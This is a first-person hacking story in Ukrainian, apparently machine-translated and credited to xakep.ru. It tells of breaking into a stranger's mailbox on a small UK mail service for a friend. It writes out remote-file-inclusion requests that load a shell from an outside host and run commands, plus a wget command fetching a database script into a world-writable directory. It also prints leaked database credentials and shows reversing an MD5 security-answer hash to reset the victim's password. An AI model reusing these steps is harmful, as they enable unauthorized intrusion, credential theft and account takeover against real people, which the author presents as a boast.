Злом мила і поштовика

Так повелося, що я ніколи не брався за злом мив. Але тут надійшло привабливу пропозицію
від одного знайомого, якому конче потрібен був доступ до одного милу.
Саме мило розташовувалося на невеликій поштовику * .co.uk.
Знайомий пробував Брут мило, але результату це не принесло і він звернувся до мене.
Спершу я простмотрел сам поштовик. Крім віконця введення логіна / пароля все суцільний html.
Спробував форму введення пароля на Sql-ін'єкцію, але ковичкі фільтрувалися.
Server: Apache / 1.3.34 (Unix) PHP / 5.0.5 mod_auth_passthrough / 1.8 mod_log_bytes / 1.2 mod_bwlimited / 1.4 FrontPage / 5.0.2.2635 mod_ssl / 2.8.25 OpenSSL / 0.9.7a
Окритія порти з сервісами теж не радували.

Вирішив перевірити, чи не хоститься чи тут ще хтось. Виявилося з даного ip числиться ще кілька десятків сайтів.
Пройшовся по ним, єдиний phpBB виявився патчений, тому жоден з експлойтів не спрацював.
І тут я натрапив на продукт ArticleBeach www.articlebeach.com.
Перший же запит:
http: //www.***.com/index.php? page = http: //durito.narod.ru/sh&cmd=ls%20-lpa
видав мені список файлів сервера. Даремно Програмісти ArticleBeach їли свій хліб з маслом.
полазити по сайту я знайшов ще одні баг, добродушно надісланий розробниками ArticleBeach,
в директорії / includes / будь-який користувач може переглянути файл config.inc такого змісту:
Приклад файлу узятий з сайту девелоперів ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $ _cn;
global $ dbserver;
global $ db;
global $ dbuser;
global $ dbpass;

// mysql database server, login, password & Database name
$ dbserver = "localhost";
$ database_connect = "article_art";
$ dbuser = "article_jer";
$ dbpass = "aaaaa";

$ connect = mysql_connect ($ dbserver, $ dbuser, $ dbpass)
or die ( "Could not connect to MySQL");
mysql_select_db ($ database_connect, $ connect);


?>
Як ви вже зрозуміли це реквізити доступу до бази даних сервера.
На жаль в моєму випадку пароль на базу даних не підійшов до фтп,
чого не скажеш про інших сайтах, де стоїть продукт від ArticleBeach.
Довелося колупати сервер через зовнішню інклуд.
Відкривши / etc / passwd я не зміг виявити ім'я потрібного мені поштовика,
логіни користувачів і доменні імена сайтів незбіжними.
Зате була можливість переглядати web-директорії користувачів: / home / * / public_html /
Уже хотів було почати тупо перебирати всіх за списком, але вирішив перевірити файл accounting.log,
в якому зберігаються логіни і доменні імена на cpanel. І точно я отримав список доменних імен.
Вибрав потрібний і став вивчати веб-директорію. Швидко знайшов в исходниках реквізити доступу до БД MySQL:
'database' => '*** _ themail', // Name of your MySQL database
'username' => '*** _ postman', // The username and password that
'password' => 'jkretj3h45j'
Пароль знову не підійшов до фтп.

Залишилося тільки причепиться до БД. Треба було шукати доступну на запис директорію або файл.
І знову спасибі розробникам ArticleBeach які подбали в своєму продукті про директорії / backup / с правами drwxrwxrwx.
http: //www.***.com/index.php? page = http: //durito.narod.ru/sh&cmd=wget -O backup / sql.php http://durito.narod.ru/sql. php
і фіг, те ж саме з GET, links, fetch, lynx. Пізніше я дізнався, що запуск wget і GET заборонявся PHP Secure, links, fetch і lynx отсутсвовали.
Продовжив внутрішній огляд сайтів хостера. Навиужівал ще кілька паролів до БД, але до фтп вони знову не підійшли, все паролі представляли собою багатосимвольний абракадабру.
І раптом тайванський сайт, інтуїція підказала перевірити його і ось воно - пароль доступу до БД - anahol !!! Конект до фтп, пас проходить і скрипт для роботи з БД від rst.void.ru залитий.

Конект до бази, знаходжу потрібну таблицю і Дампле її. А ось і заповітне мило, пароль правда зашифрований MD5,
але це можна поправити, правда довгий і клопітно. Але для початку я вирішив перевірити хеш на http://md5.rednoize.com/, але пас
не був знайдений, і я вже приготувався було до довгого перебору, але тут помітив, що і відповідь на секретне питання теж закодований в MD5.


Пробиваю на md5.rednoize.com секретне питання і ось він: Cheung !!!


Заходжу НЕ поштовик і відповідаю на секретне питання. Мені пропонують ввести новий пароль і його підтвердити. Шах і мат!
І мій приятель отримує доступ до заповітного милу, незабутні мені викотити пива. А я йду його жадібно поглинати.

опублікована на www.xakep.ru

Твій bug Durito.
_________________
EAT THE RICH!

Created 1996-2005 by durito. Copyright 2006 by durito
All Rights Reserved